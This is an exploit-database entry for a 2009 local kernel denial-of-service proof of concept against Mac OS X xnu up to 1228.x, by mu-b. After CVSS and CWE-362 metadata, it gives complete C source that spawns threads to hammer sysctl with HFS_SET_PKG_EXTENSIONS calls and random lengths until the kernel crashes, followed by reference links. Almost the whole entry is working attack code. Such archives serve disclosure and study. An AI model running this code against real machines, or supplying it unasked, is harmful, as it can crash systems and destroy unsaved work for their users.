Mac OS X xnu <=1228.x (vfssysctl) Local Kernel DoS PoC

2009.04.05
Credit: mu-b
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-362


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* xnu-vfssysctl-dos.c
 *
 * Copyright (c) 2008 by <mu-b@digit-labs.org>
 *
 * Apple MACOS X xnu <= 1228.x local kernel DoS POC
 * by mu-b - Wed 19 Nov 2008
 *
 * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386)
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */

#include <stdio.h>
#include <stdlib.h>

#include <hfs/hfs_mount.h>
#include <pthread.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <unistd.h>

void
hammer (void *arg)
{
  char buf[1024 * (255 + 1)];
  int n, name[6];

  memset (buf, 0, sizeof buf);

  while (1)
    {
      name[0] = CTL_VFS;
      name[1] = 17;
      name[2] = HFS_SET_PKG_EXTENSIONS;
      name[3] = (int) buf;
      name[4] = 1024;
      name[5] = (rand () % 254) + 1;

      n = sysctl (name, 6, NULL, NULL, NULL, 0);
      usleep(10);
    }
}

int
main (int argc, char **argv)
{
  int i, n, tid;

  printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  for (i = 0; i < 4; i++)
    {
      n = pthread_create (&tid, NULL, hammer, NULL);
      if (n < 0)
        {
          fprintf (stderr, "failed creating hammer thread\n");
          return (EXIT_FAILURE);
        }
    }

  while (1)
    sleep (1);

  /* not reached! */
  return (EXIT_SUCCESS);
}

References:

http://www.securityfocus.com/bid/34202
http://www.milw0rm.com/exploits/8265
http://www.informationweek.com/news/hardware/mac/showArticle.jhtml?articleID=216401181
http://www.digit-labs.org/files/exploits/xnu-vfssysctl-dos.c


Copyright 2024, cxsecurity.com

 
